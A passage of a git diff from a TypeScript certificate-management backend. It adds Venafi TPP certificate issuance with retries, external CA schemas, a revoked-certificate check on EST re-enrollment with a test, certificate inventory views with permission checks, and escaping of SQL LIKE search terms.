null; + + for (let attempt = 0; attempt < maxRetries; attempt += 1) { + try { + certificateResult = await retrieveCertificateFromTpp({ + appConnection, + baseUrl, + accessToken, + certificateDN: requestResponse.CertificateDN, + includeChain: true, + gatewayV2Service + }); + break; + } catch (error) { + lastError = error as Error; + logger.warn( + { + attempt: attempt + 1, + maxRetries, + certificateDN: requestResponse.CertificateDN, + error: (error as Error).message + }, + "Venafi TPP: Certificate not yet available, retrying" + ); + + if (attempt < maxRetries - 1) { + const delay = initialDelay * 2 ** attempt; + await new Promise((resolve) => { + setTimeout(resolve, Math.min(delay, 30000)); + }); + } + } + } + + if (!certificateResult) { + logger.error( + { + caId, + commonName, + certificateDN: requestResponse.CertificateDN, + maxRetries, + lastError: lastError?.message + }, + "Venafi TPP: Failed to retrieve certificate after all retry attempts" + ); + throw new BadRequestError({ + message: `Certificate request submitted to Venafi TPP (DN: ${requestResponse.CertificateDN}) but failed to retrieve after ${maxRetries} attempts. The certificate may still be pending approval or processing. Last error: ${lastError?.message || "Unknown error"}` + }); + } + } + + let cleanedCertificatePem = certificateResult.certificate.trim(); + cleanedCertificatePem = cleanedCertificatePem + .replace(new RE2("\\r\\n", "g"), "\n") + .replace(new RE2("\\r", "g"), "\n") + .trim(); + + let certObj: x509.X509Certificate; + try { + certObj = new x509.X509Certificate(cleanedCertificatePem); + } catch (error) { + logger.error( + { + caId, + commonName, + certPemLength: cleanedCertificatePem.length, + certPemStart: cleanedCertificatePem.substring(0, 100), + parseError: error instanceof Error ? error.message : "Unknown error" + }, + "Venafi TPP: Failed to parse certificate returned from TPP" + ); + throw new BadRequestError({ + message: `Failed to parse certificate from Venafi TPP: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + + logger.info( + { + serialNumber: certObj.serialNumber, + subject: certObj.subject, + notBefore: certObj.notBefore, + notAfter: certObj.notAfter, + caId + }, + "Venafi TPP: Certificate issued successfully" + ); + + const { cipherTextBlob: encryptedCertificate } = await kmsEncryptor({ + plainText: Buffer.from(new Uint8Array(certObj.rawData)) + }); + + const certificateChainPem = certificateResult.chain || ""; + + const { cipherTextBlob: encryptedCertificateChain } = await kmsEncryptor({ + plainText: Buffer.from(certificateChainPem) + }); + + let certificateId: string; + + await certificateDAL.transaction(async (tx) => { + const cert = await certificateDAL.create( + { + caId: ca.id, + profileId, + status: CertStatus.ACTIVE, + friendlyName: commonName, + commonName, + altNames: altNames.map((san) => san.value).join(","), + serialNumber: certObj.serialNumber, + notBefore: certObj.notBefore, + notAfter: certObj.notAfter, + keyUsages, + extendedKeyUsages, + keyAlgorithm, + signatureAlgorithm, + projectId: ca.projectId, + renewedFromCertificateId: isRenewal && originalCertificateId ? originalCertificateId : null + }, + tx + ); + + certificateId = cert.id; + + if (isRenewal && originalCertificateId) { + await certificateDAL.updateById(originalCertificateId, { renewedByCertificateId: cert.id }, tx); + } + + await certificateBodyDAL.create( + { + certId: cert.id, + encryptedCertificate, + encryptedCertificateChain + }, + tx + ); + + if (skLeaf) { + const { cipherTextBlob: encryptedPrivateKey } = await kmsEncryptor({ + plainText: Buffer.from(skLeaf) + }); + + await certificateSecretDAL.create( + { + certId: cert.id, + encryptedPrivateKey + }, + tx + ); + } + + if (profileId && validity?.ttl && certificateProfileDAL) { + const profile = await certificateProfileDAL.findById(profileId, tx); + if (profile) { + const finalRenewBeforeDays = calculateFinalRenewBeforeDays( + profile as { apiConfig?: { autoRenew?: boolean; renewBeforeDays?: number } }, + validity.ttl + ); + if (finalRenewBeforeDays !== undefined) { + await certificateDAL.updateById(cert.id, { renewBeforeDays: finalRenewBeforeDays }, tx); + } + } + } + }); + + logger.info( + { + certificateId: certificateId!, + caId, + commonName, + serialNumber: certObj.serialNumber + }, + "Venafi TPP: Certificate stored in database" + ); + + return { + certificate: cleanedCertificatePem, + certificateChain: certificateChainPem, + privateKey: skLeaf || "", + serialNumber: certObj.serialNumber, + certificateId: certificateId!, + ca: venafiCa + }; + } catch (error: unknown) { + if (error instanceof BadRequestError || error instanceof NotFoundError) { + throw error; + } + if (error instanceof AxiosError) { + const statusCode = error.response?.status; + // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment + const responseData = error.response?.data; + + logger.error( + { + statusCode, + // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment + responseData, + caId, + commonName + }, + "Venafi TPP: Failed to issue certificate" + ); + + throw new BadRequestError({ + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access + message: `Venafi TPP certificate issuance failed: ${responseData?.Error || error.message}` + }); + } + logger.error(error, "Venafi TPP: Unexpected error during certificate issuance"); + throw new BadRequestError({ + message: `Venafi TPP certificate issuance failed: ${(error as Error)?.message || "Unknown error"}` + }); + } finally { + if (accessToken) { + await revokeVenafiTppToken({ gatewayId, credentials }, accessToken, gatewayV2Service); + } + } + }; + + return { + createCertificateAuthority, + updateCertificateAuthority, + listCertificateAuthorities, + orderCertificateFromProfile + }; +}; diff --git a/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas.ts b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas.ts new file mode 100644 index 00000000000..ec4ff9cada6 --- /dev/null +++ b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas.ts @@ -0,0 +1,34 @@ +import { z } from "zod"; + +import { CaType } from "../certificate-authority-enums"; +import { + BaseCertificateAuthoritySchema, + GenericCreateCertificateAuthorityFieldsSchema, + GenericUpdateCertificateAuthorityFieldsSchema +} from "../certificate-authority-schemas"; + +export const VenafiTppCertificateAuthorityConfigurationSchema = z.object({ + appConnectionId: z.string().uuid().trim().describe("The Venafi TPP App Connection ID."), + policyDN: z + .string() + .trim() + .min(1, "Policy DN is required") + .describe("The policy folder DN in Venafi TPP (e.g., '\\\\VED\\\\Policy\\\\Certificates').") +}); + +export const VenafiTppCertificateAuthoritySchema = BaseCertificateAuthoritySchema.extend({ + type: z.literal(CaType.VENAFI_TPP), + configuration: VenafiTppCertificateAuthorityConfigurationSchema +}); + +export const CreateVenafiTppCertificateAuthoritySchema = GenericCreateCertificateAuthorityFieldsSchema( + CaType.VENAFI_TPP +).extend({ + configuration: VenafiTppCertificateAuthorityConfigurationSchema +}); + +export const UpdateVenafiTppCertificateAuthoritySchema = GenericUpdateCertificateAuthorityFieldsSchema( + CaType.VENAFI_TPP +).extend({ + configuration: VenafiTppCertificateAuthorityConfigurationSchema.optional() +}); diff --git a/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-types.ts b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-types.ts new file mode 100644 index 00000000000..f53e74a3d6e --- /dev/null +++ b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-types.ts @@ -0,0 +1,13 @@ +import { z } from "zod"; + +import { + CreateVenafiTppCertificateAuthoritySchema, + UpdateVenafiTppCertificateAuthoritySchema, + VenafiTppCertificateAuthoritySchema +} from "./venafi-tpp-certificate-authority-schemas"; + +export type TVenafiTppCertificateAuthority = z.infer; + +export type TCreateVenafiTppCertificateAuthorityDTO = z.infer; + +export type TUpdateVenafiTppCertificateAuthorityDTO = z.infer; diff --git a/backend/src/services/certificate-common/certificate-constants.ts b/backend/src/services/certificate-common/certificate-constants.ts index 78fe1ef2ebc..967ed6550e4 100644 --- a/backend/src/services/certificate-common/certificate-constants.ts +++ b/backend/src/services/certificate-common/certificate-constants.ts @@ -1,6 +1,7 @@ export enum CertificateRequestStatus { PENDING_APPROVAL = "pending_approval", PENDING = "pending", + PENDING_VALIDATION = "pending_validation", ISSUED = "issued", FAILED = "failed", REJECTED = "rejected" diff --git a/backend/src/services/certificate-common/external-metadata-schemas.ts b/backend/src/services/certificate-common/external-metadata-schemas.ts new file mode 100644 index 00000000000..ec50a12d7ef --- /dev/null +++ b/backend/src/services/certificate-common/external-metadata-schemas.ts @@ -0,0 +1,28 @@ +import { z } from "zod"; + +import { AWSRegion } from "@app/services/app-connection/app-connection-enums"; +import { AwsAcmValidationMethod } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-enums"; +import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; + +export const AwsAcmPublicCaExternalMetadataSchema = z.object({ + type: z.literal(CaType.AWS_ACM_PUBLIC_CA), + arn: z.string(), + region: z.nativeEnum(AWSRegion), + validationMethod: z.nativeEnum(AwsAcmValidationMethod) +}); + +export type TAwsAcmPublicCaExternalMetadata = z.infer; + +export const DigiCertExternalMetadataSchema = z.object({ + type: z.literal(CaType.DIGICERT), + orderId: z.number().int().positive() +}); + +export type TDigiCertExternalMetadata = z.infer; + +export const ExternalMetadataSchema = z.discriminatedUnion("type", [ + AwsAcmPublicCaExternalMetadataSchema, + DigiCertExternalMetadataSchema +]); + +export type TExternalMetadata = z.infer; diff --git a/backend/src/services/certificate-est-v3/certificate-est-v3-service.test.ts b/backend/src/services/certificate-est-v3/certificate-est-v3-service.test.ts index 5b2b77d0249..f71f725b937 100644 --- a/backend/src/services/certificate-est-v3/certificate-est-v3-service.test.ts +++ b/backend/src/services/certificate-est-v3/certificate-est-v3-service.test.ts @@ -6,7 +6,8 @@ /* eslint-disable @typescript-eslint/no-explicit-any */ import { afterEach, beforeEach, describe, expect, it, vi } from "vitest"; -import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { BadRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; +import { CertStatus } from "@app/services/certificate/certificate-types"; import { CertificateRequestStatus } from "@app/services/certificate-request/certificate-request-types"; import { EnrollmentType } from "../certificate-profile/certificate-profile-types"; @@ -31,6 +32,14 @@ vi.mock("@peculiar/x509", () => ({ cRLSign: 64, encipherOnly: 128, decipherOnly: 256 + }, + ExtendedKeyUsage: { + clientAuth: "1.3.6.1.5.5.7.3.2", + serverAuth: "1.3.6.1.5.5.7.3.1", + codeSigning: "1.3.6.1.5.5.7.3.3", + emailProtection: "1.3.6.1.5.5.7.3.4", + ocspSigning: "1.3.6.1.5.5.7.3.9", + timeStamping: "1.3.6.1.5.5.7.3.8" } })); @@ -84,6 +93,11 @@ describe("CertificateEstV3Service", () => { findById: vi.fn() }; + const mockCertificateDAL = { + findOne: vi.fn(), + transaction: vi.fn().mockImplementation(async (cb: (tx: unknown) => unknown) => cb({})) + }; + const mockProjectDAL = { findOne: vi.fn(), updateById: vi.fn(), @@ -152,6 +166,7 @@ describe("CertificateEstV3Service", () => { certificateV3Service: mockCertificateV3Service, certificateAuthorityDAL: mockCertificateAuthorityDAL, certificateAuthorityCertDAL: mockCertificateAuthorityCertDAL, + certificateDAL: mockCertificateDAL, projectDAL: mockProjectDAL, kmsService: mockKmsService, licenseService: mockLicenseService, @@ -165,6 +180,7 @@ describe("CertificateEstV3Service", () => { mockProjectDAL.findOne.mockResolvedValue(mockProject); mockLicenseService.getPlan.mockResolvedValue(mockPlan); mockCertificatePolicyDAL.findById.mockResolvedValue(mockPolicy); + mockCertificateDAL.findOne.mockResolvedValue(null); }); afterEach(() => { @@ -412,6 +428,20 @@ describe("CertificateEstV3Service", () => { }) ).rejects.toThrow(/requires approval/i); }); + + it("should reject re-enrollment when the client certificate is revoked", async () => { + mockCertificateDAL.findOne.mockResolvedValue({ status: CertStatus.REVOKED }); + + await expect( + service.simpleReenrollByProfile({ + csr: "mock-csr", + profileId: "profile-123", + sslClientCert: encodeURIComponent("-----BEGIN CERTIFICATE-----\nMIIB...\n-----END CERTIFICATE-----") + }) + ).rejects.toThrow(UnauthorizedError); + + expect(mockCertificateV3Service.signCertificateFromProfile).not.toHaveBeenCalled(); + }); }); describe("getCaCertsByProfile", () => { diff --git a/backend/src/services/certificate-est-v3/certificate-est-v3-service.ts b/backend/src/services/certificate-est-v3/certificate-est-v3-service.ts index e3b6edae301..22275b8e978 100644 --- a/backend/src/services/certificate-est-v3/certificate-est-v3-service.ts +++ b/backend/src/services/certificate-est-v3/certificate-est-v3-service.ts @@ -3,7 +3,9 @@ import * as x509 from "@peculiar/x509"; import { extractX509CertFromChain } from "@app/lib/certificates/extract-certificate"; import { BadRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; import { ActorType } from "@app/services/auth/auth-type"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; import { isCertChainValid } from "@app/services/certificate/certificate-fns"; +import { CertStatus } from "@app/services/certificate/certificate-types"; import { TCertificateAuthorityCertDALFactory } from "@app/services/certificate-authority/certificate-authority-cert-dal"; import { TCertificateAuthorityDALFactory } from "@app/services/certificate-authority/certificate-authority-dal"; import { getCaCertChain, getCaCertChains } from "@app/services/certificate-authority/certificate-authority-fns"; @@ -25,6 +27,7 @@ type TCertificateEstV3ServiceFactoryDep = { certificateV3Service: Pick; certificateAuthorityDAL: Pick; certificateAuthorityCertDAL: Pick; + certificateDAL: Pick; projectDAL: Pick; kmsService: Pick; licenseService: Pick; @@ -39,6 +42,7 @@ export const certificateEstV3ServiceFactory = ({ certificateV3Service, certificateAuthorityCertDAL, certificateAuthorityDAL, + certificateDAL, projectDAL, kmsService, licenseService, @@ -249,6 +253,16 @@ export const certificateEstV3ServiceFactory = ({ }); } + // Transaction forces primary (not replica) so a just-revoked cert cannot slip through replica lag. + const isRevoked = await certificateDAL.transaction(async (tx) => { + const storedCert = await certificateDAL.findOne({ serialNumber: cert.serialNumber, caId: profile.caId }, tx); + return storedCert?.status === CertStatus.REVOKED; + }); + + if (isRevoked) { + throw new UnauthorizedError({ message: "Client certificate has been revoked" }); + } + const csrObj = new x509.Pkcs10CertificateRequest(csr); if (csrObj.subject !== cert.subject) { throw new BadRequestError({ diff --git a/backend/src/services/certificate-inventory-view/certificate-inventory-view-dal.ts b/backend/src/services/certificate-inventory-view/certificate-inventory-view-dal.ts new file mode 100644 index 00000000000..be3b1283012 --- /dev/null +++ b/backend/src/services/certificate-inventory-view/certificate-inventory-view-dal.ts @@ -0,0 +1,33 @@ +import { TDbClient } from "@app/db"; +import { TableName, TCertificateInventoryViews } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify } from "@app/lib/knex"; + +export type TCertificateInventoryViewDALFactory = ReturnType; + +export const certificateInventoryViewDALFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.CertificateInventoryView); + + const findByProjectId = async (projectId: string, userId?: string): Promise => { + try { + const query = db + .replicaNode()(TableName.CertificateInventoryView) + .where({ projectId }) + .andWhere((qb) => { + void qb.where({ isShared: true }); + if (userId) { + void qb.orWhere((inner) => { + void inner.where({ createdByUserId: userId, isShared: false }); + }); + } + }) + .orderBy("name", "asc"); + + return (await query) as TCertificateInventoryViews[]; + } catch (error) { + throw new DatabaseError({ error, name: "Find certificate inventory views by project" }); + } + }; + + return { ...orm, findByProjectId }; +}; diff --git a/backend/src/services/certificate-inventory-view/certificate-inventory-view-service.ts b/backend/src/services/certificate-inventory-view/certificate-inventory-view-service.ts new file mode 100644 index 00000000000..a131ef93df3 --- /dev/null +++ b/backend/src/services/certificate-inventory-view/certificate-inventory-view-service.ts @@ -0,0 +1,256 @@ +import { ForbiddenError } from "@casl/ability"; + +import { ActionProjectType } from "@app/db/schemas"; +import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; +import { TProjectPermission } from "@app/lib/types"; + +import { TPermissionServiceFactory } from "../../ee/services/permission/permission-service-types"; +import { ProjectPermissionActions, ProjectPermissionSub } from "../../ee/services/permission/project-permission"; +import { NON_PQC_KEY_ALGORITHMS, PQC_KEY_ALGORITHMS } from "../certificate/certificate-dal"; +import { TCertificateInventoryViewDALFactory } from "./certificate-inventory-view-dal"; +import { + TCreateInventoryViewDTO, + TDeleteInventoryViewDTO, + TListInventoryViewsDTO, + TUpdateInventoryViewDTO +} from "./certificate-inventory-view-types"; + +type TSystemViewFilters = { + status?: string[]; + notAfterTo?: string; + keyAlgorithm?: string[]; +}; + +type TSystemView = { + id: string; + name: string; + filters: TSystemViewFilters; + columns: null; + isSystem: true; + createdByUserId: null; +}; + +const SYSTEM_VIEWS: TSystemView[] = [ + { id: "system-all", name: "All Certificates", filters: {}, columns: null, isSystem: true, createdByUserId: null }, + { + id: "system-expiring-7d", + name: "Expiring in 7 days", + filters: { status: ["active"], notAfterTo: "+7d" }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: "system-expiring-30d", + name: "Expiring in 30 days", + filters: { status: ["active"], notAfterTo: "+30d" }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: "system-expired", + name: "Expired", + filters: { status: ["expired"] }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: "system-revoked", + name: "Revoked", + filters: { status: ["revoked"] }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: "system-pqc", + name: "Post-Quantum (PQC)", + filters: { keyAlgorithm: PQC_KEY_ALGORITHMS }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: "system-non-pqc", + name: "Classical (Non-PQC)", + filters: { keyAlgorithm: NON_PQC_KEY_ALGORITHMS }, + columns: null, + isSystem: true, + createdByUserId: null + } +]; + +type TCertificateInventoryViewServiceFactoryDep = { + certificateInventoryViewDAL: TCertificateInventoryViewDALFactory; + permissionService: Pick; +}; + +export type TCertificateInventoryViewServiceFactory = ReturnType; + +export const certificateInventoryViewServiceFactory = ({ + certificateInventoryViewDAL, + permissionService +}: TCertificateInventoryViewServiceFactoryDep) => { + const checkProjectPermission = async ( + dto: Pick & { projectId: string }, + action: ProjectPermissionActions = ProjectPermissionActions.Read + ) => { + const { permission } = await permissionService.getProjectPermission({ + actor: dto.actor, + actorId: dto.actorId, + projectId: dto.projectId, + actorAuthMethod: dto.actorAuthMethod, + actorOrgId: dto.actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + ForbiddenError.from(permission).throwUnlessCan(action, ProjectPermissionSub.CertificateInventoryViews); + + return permission; + }; + + const listViews = async ({ projectId, actor, actorId, actorOrgId, actorAuthMethod }: TListInventoryViewsDTO) => { + await checkProjectPermission({ projectId, actor, actorId, actorOrgId, actorAuthMethod }); + + const allViews = await certificateInventoryViewDAL.findByProjectId(projectId, actorId); + + const sharedViews = allViews.filter((v) => v.isShared); + const customViews = allViews.filter((v) => !v.isShared); + + return { + systemViews: SYSTEM_VIEWS, + sharedViews: sharedViews.map((v) => ({ + ...v, + isSystem: false as const, + isShared: true as const + })), + customViews: customViews.map((v) => ({ + ...v, + isSystem: false as const, + isShared: false as const + })) + }; + }; + + const createView = async ({ + projectId, + name, + filters, + columns, + isShared = false, + actor, + actorId, + actorOrgId, + actorAuthMethod + }: TCreateInventoryViewDTO) => { + await checkProjectPermission( + { projectId, actor, actorId, actorOrgId, actorAuthMethod }, + ProjectPermissionActions.Create + ); + + try { + const view = await certificateInventoryViewDAL.create({ + projectId, + name, + filters: JSON.stringify(filters), + columns: columns ? JSON.stringify(columns) : undefined, + createdByUserId: actorId, + isShared + }); + + return view; + } catch (error) { + if (error instanceof DatabaseError && (error.error as { code?: string })?.code === "23505") { + throw new BadRequestError({ + message: isShared + ? "A shared view with this name already exists in this project" + : "You already have a view with this name" + }); + } + throw error; + } + }; + + const updateView = async ({ + viewId, + projectId, + name, + filters, + columns, + isShared, + actor, + actorId, + actorOrgId, + actorAuthMethod + }: TUpdateInventoryViewDTO) => { + await checkProjectPermission( + { projectId, actor, actorId, actorOrgId, actorAuthMethod }, + ProjectPermissionActions.Edit + ); + + const existing = await certificateInventoryViewDAL.findById(viewId); + if (!existing || existing.projectId !== projectId) { + throw new NotFoundError({ message: "View not found" }); + } + + if (existing.createdByUserId !== actorId) { + throw new BadRequestError({ message: "You can only update your own views" }); + } + + try { + const view = await certificateInventoryViewDAL.updateById(viewId, { + ...(name !== undefined && { name }), + ...(filters !== undefined && { filters: JSON.stringify(filters) }), + ...(columns !== undefined && { columns: columns ? JSON.stringify(columns) : null }), + ...(isShared !== undefined && { isShared }) + }); + + return view; + } catch (error) { + if (error instanceof DatabaseError && (error.error as { code?: string })?.code === "23505") { + throw new BadRequestError({ + message: isShared + ? "A shared view with this name already exists in this project" + : "You already have a view with this name" + }); + } + throw error; + } + }; + + const deleteView = async ({ + viewId, + projectId, + actor, + actorId, + actorOrgId, + actorAuthMethod + }: TDeleteInventoryViewDTO) => { + await checkProjectPermission( + { projectId, actor, actorId, actorOrgId, actorAuthMethod }, + ProjectPermissionActions.Delete + ); + + const existing = await certificateInventoryViewDAL.findById(viewId); + if (!existing || existing.projectId !== projectId) { + throw new NotFoundError({ message: "View not found" }); + } + + if (existing.createdByUserId !== actorId) { + throw new BadRequestError({ message: "You can only delete your own views" }); + } + + await certificateInventoryViewDAL.deleteById(viewId); + + return existing; + }; + + return { + listViews, + createView, + updateView, + deleteView + }; +}; diff --git a/backend/src/services/certificate-inventory-view/certificate-inventory-view-types.ts b/backend/src/services/certificate-inventory-view/certificate-inventory-view-types.ts new file mode 100644 index 00000000000..a5b941505e9 --- /dev/null +++ b/backend/src/services/certificate-inventory-view/certificate-inventory-view-types.ts @@ -0,0 +1,41 @@ +import { TProjectPermission } from "@app/lib/types"; + +export type TInventoryViewFilters = { + status?: string; + notAfterTo?: Date; + notAfterFrom?: Date; + notBeforeTo?: Date; + notBeforeFrom?: Date; + enrollmentTypes?: string[]; + keyAlgorithm?: string | string[]; + keySizes?: number[]; + caIds?: string[]; + profileIds?: string[]; + source?: string | string[]; +}; + +export type TListInventoryViewsDTO = { + projectId: string; +} & Omit; + +export type TCreateInventoryViewDTO = { + projectId: string; + name: string; + filters: TInventoryViewFilters; + columns?: string[]; + isShared?: boolean; +} & Omit; + +export type TUpdateInventoryViewDTO = { + viewId: string; + projectId: string; + name?: string; + filters?: TInventoryViewFilters; + columns?: string[]; + isShared?: boolean; +} & Omit; + +export type TDeleteInventoryViewDTO = { + viewId: string; + projectId: string; +} & Omit; diff --git a/backend/src/services/certificate-policy/certificate-policy-dal.ts b/backend/src/services/certificate-policy/certificate-policy-dal.ts index 4110c93f0d4..fcc21ec829b 100644 --- a/backend/src/services/certificate-policy/certificate-policy-dal.ts +++ b/backend/src/services/certificate-policy/certificate-policy-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TPkiCertificatePoliciesInsert } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify } from "@app/lib/knex"; import { applyProcessedPermissionRulesToQuery, @@ -158,7 +159,9 @@ export const certificatePolicyDALFactory = (db: TDbClient) => { if (search) { query = query.where((builder) => { - void builder.whereILike("name", `%${search}%`).orWhereILike("description", `%${search}%`); + void builder + .whereILike("name", `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike("description", `%${sanitizeSqlLikeString(search)}%`); }); } @@ -193,7 +196,9 @@ export const certificatePolicyDALFactory = (db: TDbClient) => { if (search) { query = query.where((builder) => { - void builder.whereILike("name", `%${search}%`).orWhereILike("description", `%${search}%`); + void builder + .whereILike("name", `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike("description", `%${sanitizeSqlLikeString(search)}%`); }); } diff --git a/backend/src/services/certificate-profile/certificate-profile-dal.ts b/backend/src/services/certificate-profile/certificate-profile-dal.ts index b0ba1f02c75..2276483277a 100644 --- a/backend/src/services/certificate-profile/certificate-profile-dal.ts +++ b/backend/src/services/certificate-profile/certificate-profile-dal.ts @@ -205,7 +205,16 @@ export const certificateProfileDALFactory = (db: TDbClient) => { db .ref("allowCertBasedRenewal") .withSchema(TableName.PkiScepEnrollmentConfig) - .as("scepConfigAllowCertBasedRenewal") + .as("scepConfigAllowCertBasedRenewal"), + db.ref("challengeType").withSchema(TableName.PkiScepEnrollmentConfig).as("scepConfigChallengeType"), + db + .ref("dynamicChallengeExpiryMinutes") + .withSchema(TableName.PkiScepEnrollmentConfig) + .as("scepConfigDynamicChallengeExpiryMinutes"), + db + .ref("dynamicChallengeMaxPending") + .withSchema(TableName.PkiScepEnrollmentConfig) + .as("scepConfigDynamicChallengeMaxPending") ) .where(`${TableName.PkiCertificateProfile}.id`, id) .first(); @@ -247,7 +256,10 @@ export const certificateProfileDALFactory = (db: TDbClient) => { raCertificatePem: result.scepConfigRaCertificate, raCertExpiresAt: result.scepConfigRaCertExpiresAt, includeCaCertInResponse: result.scepConfigIncludeCaCertInResponse ?? true, - allowCertBasedRenewal: result.scepConfigAllowCertBasedRenewal ?? true + allowCertBasedRenewal: result.scepConfigAllowCertBasedRenewal ?? true, + challengeType: result.scepConfigChallengeType, + dynamicChallengeExpiryMinutes: result.scepConfigDynamicChallengeExpiryMinutes, + dynamicChallengeMaxPending: result.scepConfigDynamicChallengeMaxPending } as TCertificateProfileWithConfigs["scepConfig"]) : undefined; @@ -430,7 +442,16 @@ export const certificateProfileDALFactory = (db: TDbClient) => { .ref("includeCaCertInResponse") .withSchema(TableName.PkiScepEnrollmentConfig) .as("scepIncludeCaCertInResponse"), - db.ref("allowCertBasedRenewal").withSchema(TableName.PkiScepEnrollmentConfig).as("scepAllowCertBasedRenewal") + db.ref("allowCertBasedRenewal").withSchema(TableName.PkiScepEnrollmentConfig).as("scepAllowCertBasedRenewal"), + db.ref("challengeType").withSchema(TableName.PkiScepEnrollmentConfig).as("scepChallengeType"), + db + .ref("dynamicChallengeExpiryMinutes") + .withSchema(TableName.PkiScepEnrollmentConfig) + .as("scepDynamicChallengeExpiryMinutes"), + db + .ref("dynamicChallengeMaxPending") + .withSchema(TableName.PkiScepEnrollmentConfig) + .as("scepDynamicChallengeMaxPending") ); if (processedRules) { @@ -479,7 +500,10 @@ export const certificateProfileDALFactory = (db: TDbClient) => { raCertificatePem: result.scepRaCertificate as string, raCertExpiresAt: result.scepRaCertExpiresAt as Date, includeCaCertInResponse: (result.scepIncludeCaCertInResponse as boolean) ?? true, - allowCertBasedRenewal: (result.scepAllowCertBasedRenewal as boolean) ?? true + allowCertBasedRenewal: (result.scepAllowCertBasedRenewal as boolean) ?? true, + challengeType: result.scepChallengeType as string, + dynamicChallengeExpiryMinutes: result.scepDynamicChallengeExpiryMinutes as number, + dynamicChallengeMaxPending: result.scepDynamicChallengeMaxPending as number } : undefined; diff --git a/backend/src/services/certificate-profile/certificate-profile-external-config-schemas.ts b/backend/src/services/certificate-profile/certificate-profile-external-config-schemas.ts index 7ffdc896494..f1542367f84 100644 --- a/backend/src/services/certificate-profile/certificate-profile-external-config-schemas.ts +++ b/backend/src/services/certificate-profile/certificate-profile-external-config-schemas.ts @@ -22,6 +22,21 @@ export const AcmeExternalConfigSchema = z.object({}); */ export const AwsPcaExternalConfigSchema = z.object({}); +/** + * External configuration schema for DigiCert Certificate Authority + */ +export const DigiCertExternalConfigSchema = z.object({}); + +/** + * External configuration schema for AWS ACM Public Certificate Authority + */ +export const AwsAcmPublicCaExternalConfigSchema = z.object({}); + +/** + * External configuration schema for Venafi TPP Certificate Authority + */ +export const VenafiTppExternalConfigSchema = z.object({}); + /** * Map of CA types to their corresponding external configuration schemas */ @@ -29,6 +44,9 @@ export const ExternalConfigSchemaMap = { [CaType.AZURE_AD_CS]: AzureAdCsExternalConfigSchema, [CaType.ACME]: AcmeExternalConfigSchema, [CaType.AWS_PCA]: AwsPcaExternalConfigSchema, + [CaType.DIGICERT]: DigiCertExternalConfigSchema, + [CaType.AWS_ACM_PUBLIC_CA]: AwsAcmPublicCaExternalConfigSchema, + [CaType.VENAFI_TPP]: VenafiTppExternalConfigSchema, [CaType.INTERNAL]: z.object({}).optional() // Internal CAs don't use external configs } as const; @@ -49,7 +67,15 @@ export const createExternalConfigSchema = (caType?: CaType | null) => { * Union type of all possible external configuration schemas */ export const ExternalConfigUnionSchema = z - .union([AzureAdCsExternalConfigSchema, AcmeExternalConfigSchema, AwsPcaExternalConfigSchema, z.object({})]) + .union([ + AzureAdCsExternalConfigSchema, + AcmeExternalConfigSchema, + AwsPcaExternalConfigSchema, + DigiCertExternalConfigSchema, + AwsAcmPublicCaExternalConfigSchema, + VenafiTppExternalConfigSchema, + z.object({}) + ]) .nullable() .optional(); diff --git a/backend/src/services/certificate-profile/certificate-profile-service.test.ts b/backend/src/services/certificate-profile/certificate-profile-service.test.ts index d7739441a10..b9bdd39d651 100644 --- a/backend/src/services/certificate-profile/certificate-profile-service.test.ts +++ b/backend/src/services/certificate-profile/certificate-profile-service.test.ts @@ -271,6 +271,7 @@ describe("CertificateProfileService", () => { estEnrollmentConfigDAL: mockEstEnrollmentConfigDAL, acmeEnrollmentConfigDAL: mockAcmeEnrollmentConfigDAL, scepEnrollmentConfigDAL: mockScepEnrollmentConfigDAL, + scepDynamicChallengeDAL: { deleteByConfigId: vi.fn() }, certificateBodyDAL: mockCertificateBodyDAL, certificateSecretDAL: mockCertificateSecretDAL, certificateAuthorityDAL: mockCertificateAuthorityDAL, diff --git a/backend/src/services/certificate-profile/certificate-profile-service.ts b/backend/src/services/certificate-profile/certificate-profile-service.ts index dc392b5c8e5..1a0cf859a48 100644 --- a/backend/src/services/certificate-profile/certificate-profile-service.ts +++ b/backend/src/services/certificate-profile/certificate-profile-service.ts @@ -9,6 +9,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { buildUrl } from "@app/ee/services/pki-acme/pki-acme-fns"; +import { ScepChallengeType } from "@app/ee/services/pki-scep/challenge"; +import { TScepDynamicChallengeDALFactory } from "@app/ee/services/pki-scep/pki-scep-dynamic-challenge-dal"; import { generateRaCertificate } from "@app/ee/services/pki-scep/pki-scep-fns"; import { getProcessedPermissionRules } from "@app/lib/casl/permission-filter-utils"; import { extractX509CertFromChain } from "@app/lib/certificates/extract-certificate"; @@ -99,6 +101,20 @@ const validateTemplateByExternalCaType = ( } }; +const validateAcmEnrollmentType = async ( + 